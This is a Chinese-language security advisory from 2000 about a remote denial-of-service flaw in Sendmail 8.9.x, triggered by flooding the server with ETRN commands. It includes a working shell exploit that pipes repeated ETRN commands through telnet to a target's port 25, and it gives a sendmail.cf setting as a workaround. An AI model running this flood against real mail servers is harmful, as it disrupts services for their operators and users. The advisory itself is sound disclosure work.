Sendmail ETRN拒绝服务攻击发布时间:2000-05-03 更新时间:2000-05-03 严重程度:中 威胁程度:远程拒绝服务 错误类型:设计错误 利用方式:服务器模式 受影响系统 Allman Sendmail 8.9.3\Eric Allman Sendmail 8.9.1详细描述 当客户连接到sendmail的smtpd并且发送ETRN命令给服务器时,服务器fork()s 并且sleep 5秒钟,如果有大量的ETRN命令发送,则服务器的资源可能被耗尽而导致拒绝服务攻击。 测试代码 这是一个利用程序的SH: #!/bin/sh TARGET=localhost COUNT=150 SLEEP=1 echo "gurghfrbl.sh - (c) lcamtuf '99" echo -n "Tickle" while :; do echo -n "." ( NIC=0 while [ "$NIC" -lt "$COUNT" ]; do echo "ETRN x" done ) | telnet $TARGET 25 &>/dev/null & sleep $SLEEP killall -9 telnet &>/dev/null done 解决方案 一个临时的解决办法是在sendmail.cf文件中将MaxDaemonChildren设置更改为15或者其它。 相关信息 |
